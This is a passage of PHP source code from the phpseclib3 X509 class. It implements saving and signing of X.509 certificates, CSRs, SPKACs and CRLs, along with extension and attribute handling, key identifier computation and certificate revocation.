'tbsCertList/revokedCertificates')) { $rclist_ref = &$this->subArrayUnchecked($crl, 'tbsCertList/revokedCertificates'); if ($rclist_ref) { $rclist = $crl['tbsCertList']['revokedCertificates']; foreach ($rclist as $i => $extension) { if ($this->isSubArrayValid($rclist, "$i/crlEntryExtensions")) { $this->mapInExtensions($rclist_ref, "$i/crlEntryExtensions"); } } } } $this->currentKeyIdentifier = null; $this->currentCert = $crl; return $crl; } /** * Save Certificate Revocation List. * * @param array $crl * @param int $format optional * @return string */ public function saveCRL(array $crl, $format = self::FORMAT_PEM) { if (!is_array($crl) || !isset($crl['tbsCertList'])) { return false; } $filters = []; $filters['tbsCertList']['issuer']['rdnSequence']['value'] = ['type' => ASN1::TYPE_UTF8_STRING]; $filters['tbsCertList']['signature']['parameters'] = ['type' => ASN1::TYPE_UTF8_STRING]; $filters['signatureAlgorithm']['parameters'] = ['type' => ASN1::TYPE_UTF8_STRING]; if (empty($crl['tbsCertList']['signature']['parameters'])) { $filters['tbsCertList']['signature']['parameters'] = ['type' => ASN1::TYPE_NULL]; } if (empty($crl['signatureAlgorithm']['parameters'])) { $filters['signatureAlgorithm']['parameters'] = ['type' => ASN1::TYPE_NULL]; } ASN1::setFilters($filters); $this->mapOutDNs($crl, 'tbsCertList/issuer/rdnSequence'); $this->mapOutExtensions($crl, 'tbsCertList/crlExtensions'); $rclist = &$this->subArray($crl, 'tbsCertList/revokedCertificates'); if (is_array($rclist)) { foreach ($rclist as $i => $extension) { $this->mapOutExtensions($rclist, "$i/crlEntryExtensions"); } } $crl = ASN1::encodeDER($crl, Maps\CertificateList::MAP); switch ($format) { case self::FORMAT_DER: return $crl; // case self::FORMAT_PEM: default: return "-----BEGIN X509 CRL-----\r\n" . chunk_split(Strings::base64_encode($crl), 64) . '-----END X509 CRL-----'; } } /** * Helper function to build a time field according to RFC 3280 section * - Validity * - This Update * - Next Update * - Revoked Certificates * by choosing utcTime iff year of date given is before 2050 and generalTime else. * * @param string $date in format date('D, d M Y H:i:s O') * @return array|Element */ private function timeField($date) { if ($date instanceof Element) { return $date; } $dateObj = new \DateTimeImmutable($date, new \DateTimeZone('GMT')); $year = $dateObj->format('Y'); // the same way ASN1.php parses this if ($year < 2050) { return ['utcTime' => $date]; } else { return ['generalTime' => $date]; } } /** * Sign an X.509 certificate * * $issuer's private key needs to be loaded. * $subject can be either an existing X.509 cert (if you want to resign it), * a CSR or something with the DN and public key explicitly set. * * @return mixed */ public function sign(X509 $issuer, X509 $subject) { if (!is_object($issuer->privateKey) || empty($issuer->dn)) { return false; } if (isset($subject->publicKey) && !($subjectPublicKey = $subject->formatSubjectPublicKey())) { return false; } $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($issuer->privateKey); if (isset($subject->currentCert) && is_array($subject->currentCert) && isset($subject->currentCert['tbsCertificate'])) { $this->currentCert = $subject->currentCert; $this->currentCert['tbsCertificate']['signature'] = $signatureAlgorithm; $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; if (!empty($this->startDate)) { $this->currentCert['tbsCertificate']['validity']['notBefore'] = $this->timeField($this->startDate); } if (!empty($this->endDate)) { $this->currentCert['tbsCertificate']['validity']['notAfter'] = $this->timeField($this->endDate); } if (!empty($this->serialNumber)) { $this->currentCert['tbsCertificate']['serialNumber'] = $this->serialNumber; } if (!empty($subject->dn)) { $this->currentCert['tbsCertificate']['subject'] = $subject->dn; } if (!empty($subject->publicKey)) { $this->currentCert['tbsCertificate']['subjectPublicKeyInfo'] = $subjectPublicKey; } $this->removeExtension('id-ce-authorityKeyIdentifier'); if (isset($subject->domains)) { $this->removeExtension('id-ce-subjectAltName'); } } elseif (isset($subject->currentCert) && is_array($subject->currentCert) && isset($subject->currentCert['tbsCertList'])) { return false; } else { if (!isset($subject->publicKey)) { return false; } $startDate = new \DateTimeImmutable('now', new \DateTimeZone(@date_default_timezone_get())); $startDate = !empty($this->startDate) ? $this->startDate : $startDate->format('D, d M Y H:i:s O'); $endDate = new \DateTimeImmutable('+1 year', new \DateTimeZone(@date_default_timezone_get())); $endDate = !empty($this->endDate) ? $this->endDate : $endDate->format('D, d M Y H:i:s O'); /* "The serial number MUST be a positive integer" "Conforming CAs MUST NOT use serialNumber values longer than 20 octets." -- https://tools.ietf.org/html/rfc5280#section- for the integer to be positive the leading bit needs to be 0 hence the application of a bitmap */ $serialNumber = !empty($this->serialNumber) ? $this->serialNumber : new BigInteger(Random::string(20) & ("\x7F" . str_repeat("\xFF", 19)), 256); $this->currentCert = [ 'tbsCertificate' => [ 'version' => 'v3', 'serialNumber' => $serialNumber, // $this->setSerialNumber() 'signature' => $signatureAlgorithm, 'issuer' => false, // this is going to be overwritten later 'validity' => [ 'notBefore' => $this->timeField($startDate), // $this->setStartDate() 'notAfter' => $this->timeField($endDate) // $this->setEndDate() ], 'subject' => $subject->dn, 'subjectPublicKeyInfo' => $subjectPublicKey ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => false // this is going to be overwritten later ]; // Copy extensions from CSR. $csrexts = $subject->getAttribute('pkcs-9-at-extensionRequest', 0); if (!empty($csrexts)) { $this->currentCert['tbsCertificate']['extensions'] = $csrexts; } } $this->currentCert['tbsCertificate']['issuer'] = $issuer->dn; if (isset($issuer->currentKeyIdentifier)) { $this->setExtension('id-ce-authorityKeyIdentifier', [ //'authorityCertIssuer' => array( // array( // 'directoryName' => $issuer->dn // ) //), 'keyIdentifier' => $issuer->currentKeyIdentifier ]); //$extensions = &$this->currentCert['tbsCertificate']['extensions']; //if (isset($issuer->serialNumber)) { // $extensions[count($extensions) - 1]['authorityCertSerialNumber'] = $issuer->serialNumber; //} //unset($extensions); } if (isset($subject->currentKeyIdentifier)) { $this->setExtension('id-ce-subjectKeyIdentifier', $subject->currentKeyIdentifier); } $altName = []; if (isset($subject->domains) && count($subject->domains)) { $altName = array_map(['\phpseclib3\File\X509', 'dnsName'], $subject->domains); } if (isset($subject->ipAddresses) && count($subject->ipAddresses)) { // should an IP address appear as the CN if no domain name is specified? idk //$ips = count($subject->domains) ? $subject->ipAddresses : array_slice($subject->ipAddresses, 1); $ipAddresses = []; foreach ($subject->ipAddresses as $ipAddress) { $encoded = $subject->ipAddress($ipAddress); if ($encoded !== false) { $ipAddresses[] = $encoded; } } if (count($ipAddresses)) { $altName = array_merge($altName, $ipAddresses); } } if (!empty($altName)) { $this->setExtension('id-ce-subjectAltName', $altName); } if ($this->caFlag) { $keyUsage = $this->getExtension('id-ce-keyUsage'); if (!$keyUsage) { $keyUsage = []; } $this->setExtension( 'id-ce-keyUsage', array_values(array_unique(array_merge($keyUsage, ['cRLSign', 'keyCertSign']))) ); $basicConstraints = $this->getExtension('id-ce-basicConstraints'); if (!$basicConstraints) { $basicConstraints = []; } $this->setExtension( 'id-ce-basicConstraints', array_merge(['cA' => true], $basicConstraints), true ); if (!isset($subject->currentKeyIdentifier)) { $this->setExtension('id-ce-subjectKeyIdentifier', $this->computeKeyIdentifier($this->currentCert), false, false); } } // resync $this->signatureSubject // save $tbsCertificate in case there are any \phpseclib3\File\ASN1\Element objects in it $tbsCertificate = $this->currentCert['tbsCertificate']; $this->loadX509($this->saveX509($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\0" . $issuer->privateKey->sign($this->signatureSubject); $result['tbsCertificate'] = $tbsCertificate; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Sign a CSR * * @return mixed */ public function signCSR() { if (!is_object($this->privateKey) || empty($this->dn)) { return false; } $origPublicKey = $this->publicKey; $this->publicKey = $this->privateKey->getPublicKey(); $publicKey = $this->formatSubjectPublicKey(); $this->publicKey = $origPublicKey; $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($this->privateKey); if (isset($this->currentCert) && is_array($this->currentCert) && isset($this->currentCert['certificationRequestInfo'])) { $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; if (!empty($this->dn)) { $this->currentCert['certificationRequestInfo']['subject'] = $this->dn; } $this->currentCert['certificationRequestInfo']['subjectPKInfo'] = $publicKey; } else { $this->currentCert = [ 'certificationRequestInfo' => [ 'version' => 'v1', 'subject' => $this->dn, 'subjectPKInfo' => $publicKey ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => false // this is going to be overwritten later ]; } // resync $this->signatureSubject // save $certificationRequestInfo in case there are any \phpseclib3\File\ASN1\Element objects in it $certificationRequestInfo = $this->currentCert['certificationRequestInfo']; $this->loadCSR($this->saveCSR($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\0" . $this->privateKey->sign($this->signatureSubject); $result['certificationRequestInfo'] = $certificationRequestInfo; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Sign a SPKAC * * @return mixed */ public function signSPKAC() { if (!is_object($this->privateKey)) { return false; } $origPublicKey = $this->publicKey; $this->publicKey = $this->privateKey->getPublicKey(); $publicKey = $this->formatSubjectPublicKey(); $this->publicKey = $origPublicKey; $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($this->privateKey); // re-signing a SPKAC seems silly but since everything else supports re-signing why not? if (isset($this->currentCert) && is_array($this->currentCert) && isset($this->currentCert['publicKeyAndChallenge'])) { $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; $this->currentCert['publicKeyAndChallenge']['spki'] = $publicKey; if (!empty($this->challenge)) { // the bitwise AND ensures that the output is a valid IA5String $this->currentCert['publicKeyAndChallenge']['challenge'] = $this->challenge & str_repeat("\x7F", strlen($this->challenge)); } } else { $this->currentCert = [ 'publicKeyAndChallenge' => [ 'spki' => $publicKey, // quoting , // "A challenge string that is submitted along with the public key. Defaults to an empty string if not specified." // both Firefox and OpenSSL ("openssl spkac -key private.key") behave this way // we could alternatively do this instead if we ignored the specs: // Random::string(8) & str_repeat("\x7F", 8) 'challenge' => !empty($this->challenge) ? $this->challenge : '' ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => false // this is going to be overwritten later ]; } // resync $this->signatureSubject // save $publicKeyAndChallenge in case there are any \phpseclib3\File\ASN1\Element objects in it $publicKeyAndChallenge = $this->currentCert['publicKeyAndChallenge']; $this->loadSPKAC($this->saveSPKAC($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\0" . $this->privateKey->sign($this->signatureSubject); $result['publicKeyAndChallenge'] = $publicKeyAndChallenge; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Sign a CRL * * $issuer's private key needs to be loaded. * * @return mixed */ public function signCRL(X509 $issuer, X509 $crl) { if (!is_object($issuer->privateKey) || empty($issuer->dn)) { return false; } $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($issuer->privateKey); $thisUpdate = new \DateTimeImmutable('now', new \DateTimeZone(@date_default_timezone_get())); $thisUpdate = !empty($this->startDate) ? $this->startDate : $thisUpdate->format('D, d M Y H:i:s O'); if (isset($crl->currentCert) && is_array($crl->currentCert) && isset($crl->currentCert['tbsCertList'])) { $this->currentCert = $crl->currentCert; $this->currentCert['tbsCertList']['signature'] = $signatureAlgorithm; $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; } else { $this->currentCert = [ 'tbsCertList' => [ 'version' => 'v2', 'signature' => $signatureAlgorithm, 'issuer' => false, // this is going to be overwritten later 'thisUpdate' => $this->timeField($thisUpdate) // $this->setStartDate() ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => false // this is going to be overwritten later ]; } $tbsCertList = &$this->currentCert['tbsCertList']; $tbsCertList['issuer'] = $issuer->dn; $tbsCertList['thisUpdate'] = $this->timeField($thisUpdate); if (!empty($this->endDate)) { $tbsCertList['nextUpdate'] = $this->timeField($this->endDate); // $this->setEndDate() } else { unset($tbsCertList['nextUpdate']); } if (!empty($this->serialNumber)) { $crlNumber = $this->serialNumber; } else { $crlNumber = $this->getExtension('id-ce-cRLNumber'); // "The CRL number is a non-critical CRL extension that conveys a // monotonically increasing sequence number for a given CRL scope and // CRL issuer. This extension allows users to easily determine when a // particular CRL supersedes another CRL." // -- https://tools.ietf.org/html/rfc5280#section-5.2.3 $crlNumber = $crlNumber !== false ? $crlNumber->add(new BigInteger(1)) : null; } $this->removeExtension('id-ce-authorityKeyIdentifier'); $this->removeExtension('id-ce-issuerAltName'); // Be sure version >= v2 if some extension found. $version = isset($tbsCertList['version']) ? $tbsCertList['version'] : 0; if (!$version) { if (!empty($tbsCertList['crlExtensions'])) { $version = 1; // v2. } elseif (!empty($tbsCertList['revokedCertificates'])) { foreach ($tbsCertList['revokedCertificates'] as $cert) { if (!empty($cert['crlEntryExtensions'])) { $version = 1; // v2. } } } if ($version) { $tbsCertList['version'] = $version; } } // Store additional extensions. if (!empty($tbsCertList['version'])) { // At least v2. if (!empty($crlNumber)) { $this->setExtension('id-ce-cRLNumber', $crlNumber); } if (isset($issuer->currentKeyIdentifier)) { $this->setExtension('id-ce-authorityKeyIdentifier', [ //'authorityCertIssuer' => array( // ] // 'directoryName' => $issuer->dn // ] //), 'keyIdentifier' => $issuer->currentKeyIdentifier ]); //$extensions = &$tbsCertList['crlExtensions']; //if (isset($issuer->serialNumber)) { // $extensions[count($extensions) - 1]['authorityCertSerialNumber'] = $issuer->serialNumber; //} //unset($extensions); } $issuerAltName = $this->getExtension('id-ce-subjectAltName', $issuer->currentCert); if ($issuerAltName !== false) { $this->setExtension('id-ce-issuerAltName', $issuerAltName); } } if (empty($tbsCertList['revokedCertificates'])) { unset($tbsCertList['revokedCertificates']); } unset($tbsCertList); // resync $this->signatureSubject // save $tbsCertList in case there are any \phpseclib3\File\ASN1\Element objects in it $tbsCertList = $this->currentCert['tbsCertList']; $this->loadCRL($this->saveCRL($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\0" . $issuer->privateKey->sign($this->signatureSubject); $result['tbsCertList'] = $tbsCertList; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Identify signature algorithm from key settings * * @param PrivateKey $key * @throws \phpseclib3\Exception\UnsupportedAlgorithmException if the algorithm is unsupported * @return array */ private static function identifySignatureAlgorithm(PrivateKey $key) { if ($key instanceof RSA) { if ($key->getPadding() & RSA::SIGNATURE_PSS) { $r = PSS::load($key->withPassword()->toString('PSS')); return [ 'algorithm' => 'id-RSASSA-PSS', 'parameters' => PSS::savePSSParams($r) ]; } switch ($key->getHash()) { case 'md2': case 'md5': case 'sha1': case 'sha224': case 'sha256': case 'sha384': case 'sha512': return ['algorithm' => $key->getHash() . 'WithRSAEncryption']; } throw new UnsupportedAlgorithmException('The only supported hash algorithms for RSA are: md2, md5, sha1, sha224, sha256, sha384, sha512'); } if ($key instanceof DSA) { switch ($key->getHash()) { case 'sha1': case 'sha224': case 'sha256': return ['algorithm' => 'id-dsa-with-' . $key->getHash()]; } throw new UnsupportedAlgorithmException('The only supported hash algorithms for DSA are: sha1, sha224, sha256'); } if ($key instanceof EC) { switch ($key->getCurve()) { case 'Ed25519': case 'Ed448': return ['algorithm' => 'id-' . $key->getCurve()]; } switch ($key->getHash()) { case 'sha1': case 'sha224': case 'sha256': case 'sha384': case 'sha512': return ['algorithm' => 'ecdsa-with-' . strtoupper($key->getHash())]; } throw new UnsupportedAlgorithmException('The only supported hash algorithms for EC are: sha1, sha224, sha256, sha384, sha512'); } throw new UnsupportedAlgorithmException('The only supported public key classes are: RSA, DSA, EC'); } /** * Set certificate start date * * @param \DateTimeInterface|string $date */ public function setStartDate($date) { if (!is_object($date) || !($date instanceof \DateTimeInterface)) { $date = new \DateTimeImmutable($date, new \DateTimeZone(@date_default_timezone_get())); } $this->startDate = $date->format('D, d M Y H:i:s O'); } /** * Set certificate end date * * @param \DateTimeInterface|string $date */ public function setEndDate($date) { /* To indicate that a certificate has no well-defined expiration date, the notAfter SHOULD be assigned the GeneralizedTime value of 99991231235959Z. -- http://tools.ietf.org/html/rfc5280#section- */ if (is_string($date) && strtolower($date) === 'lifetime') { $temp = '99991231235959Z'; $temp = chr(ASN1::TYPE_GENERALIZED_TIME) . ASN1::encodeLength(strlen($temp)) . $temp; $this->endDate = new Element($temp); } else { if (!is_object($date) || !($date instanceof \DateTimeInterface)) { $date = new \DateTimeImmutable($date, new \DateTimeZone(@date_default_timezone_get())); } $this->endDate = $date->format('D, d M Y H:i:s O'); } } /** * Set Serial Number * * @param string $serial * @param int $base optional */ public function setSerialNumber($serial, $base = -256) { $this->serialNumber = new BigInteger($serial, $base); } /** * Turns the certificate into a certificate authority * */ public function makeCA() { $this->caFlag = true; } /** * Check for validity of subarray * * This is intended for use in conjunction with _subArrayUnchecked(), * implementing the checks included in _subArray() but without copying * a potentially large array by passing its reference by-value to is_array(). * * @param array $root * @param string $path * @return boolean */ private function isSubArrayValid(array $root, $path) { if (!is_array($root)) { return false; } foreach (explode('/', $path) as $i) { if (!is_array($root)) { return false; } if (!isset($root[$i])) { return true; } $root = $root[$i]; } return true; } /** * Get a reference to a subarray * * This variant of _subArray() does no is_array() checking, * so $root should be checked with _isSubArrayValid() first. * * This is here for performance reasons: * Passing a reference (i.e. $root) by-value (i.e. to is_array()) * creates a copy. If $root is an especially large array, this is expensive. * * @param array $root * @param string $path absolute path with / as component separator * @param bool $create optional * @return array|false */ private function &subArrayUnchecked(array &$root, $path, $create = false) { $false = false; foreach (explode('/', $path) as $i) { if (!isset($root[$i])) { if (!$create) { return $false; } $root[$i] = []; } $root = &$root[$i]; } return $root; } /** * Get a reference to a subarray * * @param array $root * @param string $path absolute path with / as component separator * @param bool $create optional * @return array|false */ private function &subArray(array &$root = null, $path, $create = false) { $false = false; if (!is_array($root)) { return $false; } foreach (explode('/', $path) as $i) { if (!is_array($root)) { return $false; } if (!isset($root[$i])) { if (!$create) { return $false; } $root[$i] = []; } $root = &$root[$i]; } return $root; } /** * Get a reference to an extension subarray * * @param array $root * @param string $path optional absolute path with / as component separator * @param bool $create optional * @return array|false */ private function &extensions(array &$root = null, $path = null, $create = false) { if (!isset($root)) { $root = $this->currentCert; } switch (true) { case !empty($path): case !is_array($root): break; case isset($root['tbsCertificate']): $path = 'tbsCertificate/extensions'; break; case isset($root['tbsCertList']): $path = 'tbsCertList/crlExtensions'; break; case isset($root['certificationRequestInfo']): $pth = 'certificationRequestInfo/attributes'; $attributes = &$this->subArray($root, $pth, $create); if (is_array($attributes)) { foreach ($attributes as $key => $value) { if ($value['type'] == 'pkcs-9-at-extensionRequest') { $path = "$pth/$key/value/0"; break 2; } } if ($create) { $key = count($attributes); $attributes[] = ['type' => 'pkcs-9-at-extensionRequest', 'value' => []]; $path = "$pth/$key/value/0"; } } break; } $extensions = &$this->subArray($root, $path, $create); if (!is_array($extensions)) { $false = false; return $false; } return $extensions; } /** * Remove an Extension * * @param string $id * @param string $path optional * @return bool */ private function removeExtensionHelper($id, $path = null) { $extensions = &$this->extensions($this->currentCert, $path); if (!is_array($extensions)) { return false; } $result = false; foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { unset($extensions[$key]); $result = true; } } $extensions = array_values($extensions); // fix for https://bugs.php.net/75433 affecting PHP 7.2 if (!isset($extensions[0])) { $extensions = array_splice($extensions, 0, 0); } return $result; } /** * Get an Extension * * Returns the extension if it exists and false if not * * @param string $id * @param array $cert optional * @param string $path optional * @return mixed */ private function getExtensionHelper($id, array $cert = null, $path = null) { $extensions = $this->extensions($cert, $path); if (!is_array($extensions)) { return false; } foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { return $value['extnValue']; } } return false; } /** * Returns a list of all extensions in use * * @param array $cert optional * @param string $path optional * @return array */ private function getExtensionsHelper(array $cert = null, $path = null) { $exts = $this->extensions($cert, $path); $extensions = []; if (is_array($exts)) { foreach ($exts as $extension) { $extensions[] = $extension['extnId']; } } return $extensions; } /** * Set an Extension * * @param string $id * @param mixed $value * @param bool $critical optional * @param bool $replace optional * @param string $path optional * @return bool */ private function setExtensionHelper($id, $value, $critical = false, $replace = true, $path = null) { $extensions = &$this->extensions($this->currentCert, $path, true); if (!is_array($extensions)) { return false; } $newext = ['extnId' => $id, 'critical' => $critical, 'extnValue' => $value]; foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { if (!$replace) { return false; } $extensions[$key] = $newext; return true; } } $extensions[] = $newext; return true; } /** * Remove a certificate, CSR or CRL Extension * * @param string $id * @return bool */ public function removeExtension($id) { return $this->removeExtensionHelper($id); } /** * Get a certificate, CSR or CRL Extension * * Returns the extension if it exists and false if not * * @param string $id * @param array $cert optional * @param string $path * @return mixed */ public function getExtension($id, array $cert = null, $path = null) { return $this->getExtensionHelper($id, $cert, $path); } /** * Returns a list of all extensions in use in certificate, CSR or CRL * * @param array $cert optional * @param string $path optional * @return array */ public function getExtensions(array $cert = null, $path = null) { return $this->getExtensionsHelper($cert, $path); } /** * Set a certificate, CSR or CRL Extension * * @param string $id * @param mixed $value * @param bool $critical optional * @param bool $replace optional * @return bool */ public function setExtension($id, $value, $critical = false, $replace = true) { return $this->setExtensionHelper($id, $value, $critical, $replace); } /** * Remove a CSR attribute. * * @param string $id * @param int $disposition optional * @return bool */ public function removeAttribute($id, $disposition = self::ATTR_ALL) { $attributes = &$this->subArray($this->currentCert, 'certificationRequestInfo/attributes'); if (!is_array($attributes)) { return false; } $result = false; foreach ($attributes as $key => $attribute) { if ($attribute['type'] == $id) { $n = count($attribute['value']); switch (true) { case $disposition == self::ATTR_APPEND: case $disposition == self::ATTR_REPLACE: return false; case $disposition >= $n: $disposition -= $n; break; case $disposition == self::ATTR_ALL: case $n == 1: unset($attributes[$key]); $result = true; break; default: unset($attributes[$key]['value'][$disposition]); $attributes[$key]['value'] = array_values($attributes[$key]['value']); $result = true; break; } if ($result && $disposition != self::ATTR_ALL) { break; } } } $attributes = array_values($attributes); return $result; } /** * Get a CSR attribute * * Returns the attribute if it exists and false if not * * @param string $id * @param int $disposition optional * @param array $csr optional * @return mixed */ public function getAttribute($id, $disposition = self::ATTR_ALL, array $csr = null) { if (empty($csr)) { $csr = $this->currentCert; } $attributes = $this->subArray($csr, 'certificationRequestInfo/attributes'); if (!is_array($attributes)) { return false; } foreach ($attributes as $key => $attribute) { if ($attribute['type'] == $id) { $n = count($attribute['value']); switch (true) { case $disposition == self::ATTR_APPEND: case $disposition == self::ATTR_REPLACE: return false; case $disposition == self::ATTR_ALL: return $attribute['value']; case $disposition >= $n: $disposition -= $n; break; default: return $attribute['value'][$disposition]; } } } return false; } /** * Returns a list of all CSR attributes in use * * @param array $csr optional * @return array */ public function getAttributes(array $csr = null) { if (empty($csr)) { $csr = $this->currentCert; } $attributes = $this->subArray($csr, 'certificationRequestInfo/attributes'); $attrs = []; if (is_array($attributes)) { foreach ($attributes as $attribute) { $attrs[] = $attribute['type']; } } return $attrs; } /** * Set a CSR attribute * * @param string $id * @param mixed $value * @param int $disposition optional * @return bool */ public function setAttribute($id, $value, $disposition = self::ATTR_ALL) { $attributes = &$this->subArray($this->currentCert, 'certificationRequestInfo/attributes', true); if (!is_array($attributes)) { return false; } switch ($disposition) { case self::ATTR_REPLACE: $disposition = self::ATTR_APPEND; // fall-through case self::ATTR_ALL: $this->removeAttribute($id); break; } foreach ($attributes as $key => $attribute) { if ($attribute['type'] == $id) { $n = count($attribute['value']); switch (true) { case $disposition == self::ATTR_APPEND: $last = $key; break; case $disposition >= $n: $disposition -= $n; break; default: $attributes[$key]['value'][$disposition] = $value; return true; } } } switch (true) { case $disposition >= 0: return false; case isset($last): $attributes[$last]['value'][] = $value; break; default: $attributes[] = ['type' => $id, 'value' => $disposition == self::ATTR_ALL ? $value : [$value]]; break; } return true; } /** * Sets the subject key identifier * * This is used by the id-ce-authorityKeyIdentifier and the id-ce-subjectKeyIdentifier extensions. * * @param string $value */ public function setKeyIdentifier($value) { if (empty($value)) { unset($this->currentKeyIdentifier); } else { $this->currentKeyIdentifier = $value; } } /** * Compute a public key identifier. * * Although key identifiers may be set to any unique value, this function * computes key identifiers from public key according to the two * recommended methods ( RFC 3280). * Highly polymorphic: try to accept all possible forms of key: * - Key object * - \phpseclib3\File\X509 object with public or private key defined * - Certificate or CSR array * - \phpseclib3\File\ASN1\Element object * - PEM or DER string * * @param mixed $key optional * @param int $method optional * @return string binary key identifier */ public function computeKeyIdentifier($key = null, $method = 1) { if (is_null($key)) { $key = $this; } switch (true) { case is_string($key): break; case is_array($key) && isset($key['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey']): return $this->computeKeyIdentifier($key['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'], $method); case is_array($key) && isset($key['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey']): return $this->computeKeyIdentifier($key['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'], $method); case !is_object($key): return false; case $key instanceof Element: // Assume the element is a bitstring-packed key. $decoded = ASN1::decodeBER($key->element); if (!$decoded) { return false; } $raw = ASN1::asn1map($decoded[0], ['type' => ASN1::TYPE_BIT_STRING]); if (empty($raw)) { return false; } // If the key is private, compute identifier from its corresponding public key. $key = PublicKeyLoader::load($raw); if ($key instanceof PrivateKey) { // If private. return $this->computeKeyIdentifier($key, $method); } $key = $raw; // Is a public key. break; case $key instanceof X509: if (isset($key->publicKey)) { return $this->computeKeyIdentifier($key->publicKey, $method); } if (isset($key->privateKey)) { return $this->computeKeyIdentifier($key->privateKey, $method); } if (isset($key->currentCert['tbsCertificate']) || isset($key->currentCert['certificationRequestInfo'])) { return $this->computeKeyIdentifier($key->currentCert, $method); } return false; default: // Should be a key object (i.e.: \phpseclib3\Crypt\RSA). $key = $key->getPublicKey(); break; } // If in PEM format, convert to binary. $key = ASN1::extractBER($key); // Now we have the key string: compute its sha-1 sum. $hash = new Hash('sha1'); $hash = $hash->hash($key); if ($method == 2) { $hash = substr($hash, -8); $hash[0] = chr((ord($hash[0]) & 0x0F) | 0x40); } return $hash; } /** * Format a public key as appropriate * * @return array|false */ private function formatSubjectPublicKey() { $format = $this->publicKey instanceof RSA && ($this->publicKey->getPadding() & RSA::SIGNATURE_PSS) ? 'PSS' : 'PKCS8'; $publicKey = base64_decode(preg_replace('#-.+-|[\r\n]#', '', $this->publicKey->toString($format))); $decoded = ASN1::decodeBER($publicKey); if (!$decoded) { return false; } $mapped = ASN1::asn1map($decoded[0], Maps\SubjectPublicKeyInfo::MAP); if (!is_array($mapped)) { return false; } $mapped['subjectPublicKey'] = $this->publicKey->toString($format); return $mapped; } /** * Set the domain name's which the cert is to be valid for * * @param mixed ...$domains * @return void */ public function setDomain(...$domains) { $this->domains = $domains; $this->removeDNProp('id-at-commonName'); $this->setDNProp('id-at-commonName', $this->domains[0]); } /** * Set the IP Addresses's which the cert is to be valid for * * @param mixed[] ...$ipAddresses */ public function setIPAddress(...$ipAddresses) { $this->ipAddresses = $ipAddresses; /* if (!isset($this->domains)) { $this->removeDNProp('id-at-commonName'); $this->setDNProp('id-at-commonName', $this->ipAddresses[0]); } */ } /** * Helper function to build domain array * * @param string $domain * @return array */ private static function dnsName($domain) { return ['dNSName' => $domain]; } /** * Helper function to build IP Address array * * (IPv6 is not currently supported) * * @param string $address * @return array */ private function iPAddress($address) { return ['iPAddress' => $address]; } /** * Get the index of a revoked certificate. * * @param array $rclist * @param string $serial * @param bool $create optional * @return int|false */ private function revokedCertificate(array &$rclist, $serial, $create = false) { $serial = new BigInteger($serial); foreach ($rclist as $i => $rc) { if (!($serial->compare($rc['userCertificate']))) { return $i; } } if (!$create) { return false; } $i = count($rclist); $revocationDate = new \DateTimeImmutable('now', new \DateTimeZone(@date_default_timezone_get())); $rclist[] = ['userCertificate' => $serial, 'revocationDate' => $this->timeField($revocationDate->format('D, d M Y H:i:s O'))]; return $i; } /** * Revoke a certificate. * * @param string $serial * @param string $date optional * @return bool */ public function revoke($serial, $date = null) { if (isset($this->currentCert['tbsCertList'])) { if (is_array($rclist = &$this->subArray($this->currentCert, 'tbsCertList/revokedCertificates', true))) { if ($this->revokedCertificate($rclist, $serial) === false) { // If not yet revoked if (($i = $this->revokedCertificate($rclist, $serial, true)) !== false) { if (!empty($date)) { $rclist[$i]['revocationDate'] = $this->timeField($date); } return true; } } } } return false; } /** * Unrevoke a certificate. * * @param string $serial * @return bool */ public function unrevoke($serial) { if (is_array($rclist = &$this->subArray($this->currentCert, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== false) { unset($rclist[$i]); $rclist = array_values($rclist); return true; } } return false; } /** * Get a revoked certificate. * * @param string $serial * @return mixed */ public function getRevoked($serial) { if (is_array($rclist = $this->subArray($this->currentCert, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== false) { return $rclist[$i]; } } return false; } /** * List revoked certificates * * @param array $crl optional * @return array|bool */ public function listRevoked(array $crl = null) { if (!isset($crl)) { $crl = $this->currentCert; } if (!isset($crl['tbsCertList'])) { return false; } $result = []; if (is_array($rclist = $this->subArray($crl, 'tbsCertList/revokedCertificates'))) { foreach ($rclist as $rc) { $result[] = $rc['userCertificate']->toString(); } } return $result; } /** * Remove a Revoked Certificate Extension * * @param string $serial * @param string $id * @return bool */ public function removeRevokedCertificateExtension($serial, $id) { if (is_array($rclist = &$this->subArray($this->currentCert, 'tbsCertList/revokedCertificates'))) { if 